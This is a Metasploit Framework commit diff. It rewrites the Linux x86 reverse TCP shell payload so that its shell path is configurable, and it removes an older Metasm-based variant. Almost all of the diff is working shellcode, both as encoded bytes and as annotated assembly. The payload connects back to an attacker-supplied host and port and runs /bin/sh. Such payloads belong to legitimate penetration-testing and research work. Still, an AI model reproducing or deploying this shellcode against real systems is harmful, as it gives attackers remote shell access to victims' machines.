Make x86/shell_reverse_tcp's shell path configurable.

Also removes shell_reverse_tcp2 shell.
bug/bundler_fix
joev 2016-02-18 20:24:30 -06:00
parent 37f077c79e
commit e67e477362
2 changed files with 54 additions and 146 deletions

View File

@ -10,8 +10,6 @@ require 'msf/base/sessions/command_shell_options'
module Metasploit3
CachedSize = 68
include Msf::Payload::Single
include Msf::Payload::Linux
include Msf::Sessions::CommandShellOptions
@ -20,56 +18,64 @@ module Metasploit3
super(merge_info(info,
'Name' => 'Linux Command Shell, Reverse TCP Inline',
'Description' => 'Connect back to attacker and spawn a command shell',
'Author' => 'Ramon de C Valle',
'Author' => ['Ramon de C Valle', 'joev'],
'License' => MSF_LICENSE,
'Platform' => 'linux',
'Arch' => ARCH_X86,
'Handler' => Msf::Handler::ReverseTcp,
'Session' => Msf::Sessions::CommandShellUnix,
'Payload' =>
{
'Offsets' =>
{
'LHOST' => [ 25, 'ADDR' ],
'LPORT' => [ 32, 'n' ],
},
'Payload' =>
"\x31\xdb" +# xor ebx,ebx
"\xf7\xe3" +# mul ebx
"\x53" +# push ebx
"\x43" +# inc ebx
"\x53" +# push ebx
"\x6a\x02" +# push byte +0x2
"\x89\xe1" +# mov ecx,esp
"\xb0\x66" +# mov al,0x66
"\xcd\x80" +# int 0x80
"\x93" +# xchg eax,ebx
"\x59" +# pop ecx
"\xb0\x3f" +# mov al,0x3f
"\xcd\x80" +# int 0x80
"\x49" +# dec ecx
"\x79\xf9" +# jns 0x11
"\x68\x7f\x00\x00\x01" +# push dword 0x100007f
"\x68\x02\x00\xbf\xbf" +# push dword 0xbfbf0002
"\x89\xe1" +# mov ecx,esp
"\xb0\x66" +# mov al,0x66
"\x50" +# push eax
"\x51" +# push ecx
"\x53" +# push ebx
"\xb3\x03" +# mov bl,0x3
"\x89\xe1" +# mov ecx,esp
"\xcd\x80" +# int 0x80
"\x52" +# push edx
"\x68\x2f\x2f\x73\x68" +# push dword 0x68732f2f
"\x68\x2f\x62\x69\x6e" +# push dword 0x6e69622f
"\x89\xe3" +# mov ebx,esp
"\x52" +# push edx
"\x53" +# push ebx
"\x89\xe1" +# mov ecx,esp
"\xb0\x0b" +# mov al,0xb
"\xcd\x80" # int 0x80
}
))
'Session' => Msf::Sessions::CommandShellUnix
))
register_options([
OptString.new('CMD', [ true, "The command string to execute", "/bin/sh" ])
])
end
def generate
# pad the shell path to a multiple of 4 with slashes
shell = datastore['CMD']
remainder = shell.bytes.length % 4
shell_padded = ("/" * (4-remainder)) + shell
"\x31\xdb" +# xor ebx,ebx
"\xf7\xe3" +# mul ebx
"\x53" +# push ebx
"\x43" +# inc ebx
"\x53" +# push ebx
"\x6a\x02" +# push byte +0x2
"\x89\xe1" +# mov ecx,esp
"\xb0\x66" +# mov al,0x66 (sys_socketcall)
"\xcd\x80" +# int 0x80
"\x93" +# xchg eax,ebx
"\x59" +# pop ecx
"\xb0\x3f" +# mov al,0x3f (sys_dup2)
"\xcd\x80" +# int 0x80
"\x49" +# dec ecx
"\x79\xf9" +# jns 0x11
"\x68" + [IPAddr.new(datastore['LHOST'], Socket::AF_INET).to_i].pack('N') + # push dword 0x100007f
"\x68\x02\x00" + [datastore['LPORT'].to_i].pack('S>') + # push dword 0xbfbf0002
"\x89\xe1" +# mov ecx,esp
"\xb0\x66" +# mov al,0x66 (sys_socketcall)
"\x50" +# push eax
"\x51" +# push ecx
"\x53" +# push ebx
"\xb3\x03" +# mov bl,0x3
"\x89\xe1" +# mov ecx,esp
"\xcd\x80" +# int 0x80
"\x52" +# push edx
# Split shellname into 4-byte words and push them one-by-one
# on to the stack
shell_padded.bytes.reverse.each_slice(4).map do |word|
"\x68" + word.reverse.pack('C*')
end.join +
"\x89\xe3" +# mov ebx,esp
"\x52" +# push edx
"\x53" +# push ebx
"\x89\xe1" +# mov ecx,esp
"\xb0\x0b" +# mov al,0xb (execve)
"\xcd\x80" # int 0x80
end
end

View File

@ -1,98 +0,0 @@
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'metasm'
require 'msf/core'
require 'msf/core/handler/reverse_tcp'
require 'msf/base/sessions/command_shell'
require 'msf/base/sessions/command_shell_options'
module Metasploit3
CachedSize = 70
include Msf::Payload::Single
include Msf::Payload::Linux
include Msf::Sessions::CommandShellOptions
def initialize(info = {})
# Remark: this function seems to be called a LOT, even before the shellcode is used.
# We would better implement some caching.
# We decoded skape's shellcode by using irb -r metasm-shell
# and: puts shellcode.decode
super(merge_info(info,
'Name' => 'Linux Command Shell, Reverse TCP Inline - Metasm Demo',
'Description' => 'Connect back to attacker and spawn a command shell',
'Author' => ['skape', 'Yoann Guillot', 'Julien Tinnes <julien[at]cr0.org>'],
'License' => MSF_LICENSE,
'Platform' => 'linux',
'Arch' => ARCH_X86,
'Handler' => Msf::Handler::ReverseTcp,
'Session' => Msf::Sessions::CommandShellUnix,
'Payload' =>
{
'Offsets' =>
{
'LHOST' => [ 0, 'ADDR' ],
'LPORT' => [ 0, 'n' ],
},
'Assembly' => <<EOS
xor ebx, ebx ; @00000000 31db
push ebx ; @00000002 53
inc ebx ; @00000003 43
push ebx ; @00000004 53
push 2 ; @00000005 6a02
push 66h ; @00000007 6a66
pop eax ; @00000009 58
mov ecx, esp ; @0000000a 89e1
int 80h ; @0000000c cd80
xchg ebx, eax ; @0000000e 93
pop ecx ; @0000000f 59
; Xrefs: 0000000f, 00000015
xref_00000010_uuidfdbd8:
mov al, 3fh ; @00000010 b03f
int 80h ; @00000012 cd80
dec ecx ; @00000014 49
jns xref_00000010_uuidfdbd8 ; @00000015 79f9 -- to 10h
; Xrefs: 00000015
pop ebx ; @00000017 5b
pop edx ; @00000018 5a
push LHOST ; @00000019 687f000001
push.i16 LPORT ; @0000001e 6668bfbf
inc ebx ; @00000022 43
push bx ; @00000023 6653
mov ecx, esp ; @00000025 89e1
mov al, 66h ; @00000027 b066
push eax ; @00000029 50
push ecx ; @0000002a 51
push ebx ; @0000002b 53
mov ecx, esp ; @0000002c 89e1
inc ebx ; @0000002e 43
int 80h ; @0000002f cd80
push edx ; @00000031 52
push 68732f2fh ; @00000032 682f2f7368
push 6e69622fh ; @00000037 682f62696e
mov ebx, esp ; @0000003c 89e3
push edx ; @0000003e 52
push ebx ; @0000003f 53
mov ecx, esp ; @00000040 89e1
mov al, 0bh ; @00000042 b00b
int 80h ; @00000044 cd80
EOS
}
))
end
# hardcode the size of the encoded payload, otherwise the shellcode is assembled during msf initialization
def size
#puts "size of #{name}: #{super()}"
103
end
end